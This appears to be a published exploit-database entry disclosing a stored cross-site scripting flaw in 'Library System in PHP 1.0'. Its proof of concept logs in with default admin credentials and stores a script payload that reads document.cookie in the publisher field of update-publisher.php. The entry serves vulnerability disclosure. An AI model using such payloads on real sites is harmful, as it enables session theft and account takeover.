# Exploit Title: Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)# Google Dork: NA# Date: 03-OCT-2021# Exploit Author: Akash Rajendra Patil# Vendor Homepage: https://www.yahoobaba.net/project/library-system-in-php# Software Link: https://www.yahoobaba.net/project/library-system-in-php# Version: V 1.0# Tested on: WAMPP# Description #
Library System in PHP V1.0is vulnerable to stored cross site scripting because of insufficient user supplied data sanitisation.# Proof of Concept (PoC) :#Exploit:1) Goto: http://localhost/library-system/dashboard.php
2) Login as admin using test credentials: admin/admin
3) Goto: http://localhost/library-system/update-publisher.php?pid=124) Enter the following payload in the publisher field:<script>alert(document.cookie)</script>5) Click on Save
6) Our payload is fired and stored
